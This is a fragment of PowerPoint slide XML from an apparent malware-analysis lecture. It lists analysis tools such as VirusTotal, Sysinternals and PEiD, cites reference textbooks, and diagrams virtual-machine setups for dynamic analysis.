        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> Reflector: reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>VirusTotal.com: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Malwr.com (Cuckoo Sandbox): automated malware analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Sysinternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Suite, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Process Explorer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>(procexp.exe), Process Monitor (procmon.exe), Strings, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9107916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Surface Analysis	</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>www.virustotal .com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Packed or Obfuscated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PEiD</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>String contained</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Hashing check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>md5deep </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1297959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Text-books</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1196752"/>
            <a:ext cx="6767445" cy="5112568"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Michael Sikorski and Andrew </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Honig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Practical Malware Analysis: The Hands-on Guide to Dissecting Malicious Software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”, No Starch Press, ISBN-10: 1-59327-290-1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dennis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Yurichev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reverse Engineering for Beginners</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”, 2013-2015.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Káº¿t quáº£ hÃ¬nh áº£nh cho Practical Malware Analysis: The Hands-on Guide to Dissecting Maliciou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645" y="1124744"/>
            <a:ext cx="1835091" cy="242582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788" y="3874721"/>
            <a:ext cx="1823792" cy="257861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58949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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>VMWare</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>VirtualBox</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Parallels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Virtual PC</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>QEMU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3059911" y="1966697"/>
            <a:ext cx="5256584" cy="3825368"/>
            <a:chOff x="3131840" y="2627968"/>
            <a:chExt cx="5256584" cy="3825368"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3131840" y="2996952"/>
              <a:ext cx="5256584" cy="3456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3491880" y="3284984"/>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a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3462288" y="4365104"/>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a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3462288" y="5373216"/>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a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6084168" y="3645024"/>
              <a:ext cx="2160240" cy="2448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6480212" y="3861048"/>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a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6480212" y="4754286"/>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a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6701948" y="5607399"/>
              <a:ext cx="1095813" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                <a:t>Guest OS </a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5538757" y="6074374"/>
              <a:ext cx="442750" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                <a:t>OS</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6232204" y="3251548"/>
              <a:ext cx="1701107" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
                <a:t>Virtual machine</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 14"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5256874" y="2627968"/>
              <a:ext cx="1815946" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
                <a:t>Physical machine</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23314361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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="816315" y="1495768"/>
            <a:ext cx="5688632" cy="1008112"/>
            <a:chOff x="971600" y="1873131"/>
            <a:chExt cx="5688632" cy="1008112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Cloud 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5004048" y="1873131"/>
              <a:ext cx="1656184" cy="100811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External Network</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 8"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="971600" y="1916832"/>
              <a:ext cx="1656184" cy="792088"/>
              <a:chOff x="971600" y="1916832"/>
              <a:chExt cx="1656184" cy="792088"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="4" name="Rectangle 3"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1043608" y="1916832"/>
                <a:ext cx="1296144"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71600" y="1948191"/>
                <a:ext cx="1656184" cy="307777"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
                  <a:t>Virtual Machine</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Rectangle 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1907706" y="2420888"/>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NIC</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3131840" y="1916832"/>
              <a:ext cx="1296144"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3059832" y="1948191"/>
              <a:ext cx="1656184" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
                <a:t>Physical Machine</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3995938" y="2420888"/>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NIC</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3131840" y="2420888"/>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NIC</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Straight Connector 16"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="8" idx="3"/>
              <a:endCxn id="15" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2339754" y="2564904"/>
              <a:ext cx="7920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3" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4427986" y="2564904"/>
              <a:ext cx="57606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827584" y="3399167"/>
            <a:ext cx="3600400" cy="3171404"/>
            <a:chOff x="971600" y="3281932"/>
            <a:chExt cx="3600400" cy="3171404"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="23" name="Group 22"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="971600" y="4480813"/>
              <a:ext cx="1656184" cy="792088"/>
              <a:chOff x="971600" y="1916832"/>
              <a:chExt cx="1656184" cy="792088"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="Rectangle 29"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1043608" y="1916832"/>
                <a:ext cx="1296144"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971600" y="1948191"/>
                <a:ext cx="1656184" cy="523220"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
                  <a:t>Virtual Machine</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
                  <a:t>Service</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32" name="Rectangle 31"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1907706" y="2420888"/>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NIC</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="39" name="Group 38"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="971600" y="3281932"/>
              <a:ext cx="3600400" cy="1008112"/>
              <a:chOff x="971600" y="3281932"/>
              <a:chExt cx="3600400" cy="1008112"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22" name="Cloud 21"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2915816" y="3281932"/>
                <a:ext cx="1656184" cy="100811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External Network</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="24" name="Rectangle 23"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1043608" y="3325633"/>
                <a:ext cx="1296144"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971600" y="3356992"/>
                <a:ext cx="1656184" cy="307777"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
                  <a:t>Physical Machine</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="Rectangle 25"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1907706" y="3829689"/>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NIC</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="29" name="Straight Connector 28"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="26" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2339754" y="3973705"/>
                <a:ext cx="57606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971600" y="5661248"/>
              <a:ext cx="1656184" cy="792088"/>
              <a:chOff x="971600" y="1916832"/>
              <a:chExt cx="1656184" cy="792088"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="Rectangle 33"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1043608" y="1916832"/>
                <a:ext cx="1296144"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971600" y="1948191"/>
                <a:ext cx="1656184" cy="523220"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
                  <a:t>Virtual Machine</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
                  <a:t>Analysis</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="Rectangle 35"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1907706" y="2420888"/>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NIC</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Rectangle 39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3347864" y="5420851"/>
              <a:ext cx="864098" cy="53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VMNet</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="42" name="Straight Connector 41"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="40" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2339754" y="5155227"/>
              <a:ext cx="1008110" cy="531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6" idx="3"/>
              <a:endCxn id="40" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2339754" y="5687033"/>
              <a:ext cx="1008110" cy="6222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50" name="Rectangle 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431542" y="1194528"/>
            <a:ext cx="6322786" cy="1586399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
